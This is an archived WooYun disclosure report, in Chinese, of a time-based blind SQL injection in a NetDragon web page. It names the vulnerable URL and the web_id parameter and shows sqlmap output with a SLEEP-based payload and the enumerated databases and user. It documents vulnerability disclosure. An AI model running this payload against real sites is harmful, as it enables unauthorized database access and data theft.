乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
网龙某站存在SQL盲注漏洞
注入url:
http://click.99.com/static.php?channel=20016&web_id=2303663&kind=1
注入参数:
web_id
放入sqlmap跑下:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: web_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: channel=20016&web_id=2303663 AND (SELECT * FROM (SELECT(SLEEP(5)))GyUZ)&kind=1---[14:14:05] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.6, Apacheback-end DBMS: MySQL 5.0.12[14:14:05] [INFO] fetching database names[14:14:05] [INFO] fetching number of databases[14:14:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[14:14:05] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [14:14:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 2[14:14:21] [INFO] retrieved: [14:14:27] [INFO] adjusting time delay to 1 second due to good response timesinformation_schema[14:15:45] [INFO] retrieved: click91available databases [2]:[*] click91[*] information_schema
[14:17:01] [INFO] retrieved: [14:17:11] [INFO] adjusting time delay to 2 seconds due to good response times'click91'@'192.168.33.0/255.255.255.0'database management system users [1]:[*] 'click91'@'192.168.33.0/255.255.255.0'
过滤转义!
危害等级:中
漏洞Rank:8
确认时间:2015-10-10 09:15
感谢星明月稀
暂无